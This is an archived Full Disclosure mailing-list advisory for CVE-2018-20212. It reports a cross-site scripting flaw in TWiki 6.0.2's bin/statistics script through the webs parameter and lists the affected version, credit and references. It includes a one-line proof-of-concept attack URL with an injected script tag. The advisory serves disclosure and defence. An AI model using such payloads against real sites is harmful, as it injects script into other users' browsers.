[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] /bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter(CVE-2018-20212)

To: "fulldisclosure" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] /bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter(CVE-2018-20212)
From: "zzt0907" <16362505@xxxxxx>
Date: Thu, 3 Jan 2019 08:19:21 +0800

# bin/statistics in TWiki 6.0.2 allows XSS via the webs 
parameter(CVE-2018-20212)


## Vulnerability Type
Cross Site Scripting (XSS)


## Vendor of Product:
twiki


## Affected Product Version
twiki - 6.0.2


## Affected Component
twiki/bin/statistics


## Attack Type
Remote


## Attack Vectors
/twiki/bin/statistics?webs=<script>alert(1)</script>


## Credit 
This vulnerability was discovered by Jiawang Zhang Coordination Center of China 
(CNCERT/CC)


## Product Download
http://twiki.org/cgi-bin/view/Codev/DownloadTWiki


## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20212

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: Re: [FD] [CVE-2018-18009] dirary0.js on D-Link DIR-140L, DIR-640L devices allows remote unauthenticated attackers to discover admin credentials
Next by Date: [FD] Multiple Cross-site Scripting Vulnerabilities in ImpressCMS 1.3.10
Previous by thread: Re: [FD] [CVE-2018-18009] dirary0.js on D-Link DIR-140L, DIR-640L devices allows remote unauthenticated attackers to discover admin credentials
Next by thread: [FD] Multiple Cross-site Scripting Vulnerabilities in ImpressCMS 1.3.10
Index(es):
- Date
- Thread